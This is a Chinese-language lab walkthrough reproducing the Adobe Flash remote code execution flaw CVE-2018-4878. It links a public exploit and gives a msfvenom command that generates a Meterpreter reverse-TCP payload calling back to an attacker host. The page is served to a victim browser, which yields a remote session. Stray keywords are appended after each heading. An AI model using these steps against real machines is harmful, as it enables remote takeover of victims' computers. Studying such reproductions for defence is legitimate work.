Adboe Flash远程代码执行_CVE-2018-4878漏洞复现html
1、漏洞描述python
该漏洞可针对windows用户发起定向攻击。攻击者能够诱导用户打开包含恶意Flash代码文件的Microsoft Office文档、网页、垃圾电子邮件等。git
2、漏洞影响版本github
Flash Player版本28.0.0.137以及以前的全部版本web
3、漏洞复现环境搭建shell
攻击机:kali ip:192.168.10.136windows
靶机:win10 ie默认集成flash,没有升级tcp
4、漏洞复现spa
1.github下载exp, https://github.com/anbai-inc/CVE-2018-4878code
2.修改exp
2.1修改shellcode为本身生成的反弹链接shellcode,首先先生成反弹链接shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.136 lport=8888 -f python >/root/shellcode.txt
2.2用生成的shellcode替换exp中对应的shellcode
2.3修改exp中生成文件保存的路径
3.运行python脚本,会生成两个文件, exploit.swf和index.html
4.把exploit.swf和index.html复制到/var/www/html,而后开启web服务, 此时,Kali Linux上Web服务启动,而且具有index.html这个页面。只要靶机启用flash并访问了这个页面,则能够直接被控制
5.kali 开启监听
6.靶机访问http://192.168.10.136/index.html
7.此时kali端已经获取到会话
5、漏洞防护
1.下载最新版本的Adobe Flash
2.安装常见杀毒软件,开启实时防御和杀毒引擎实时升级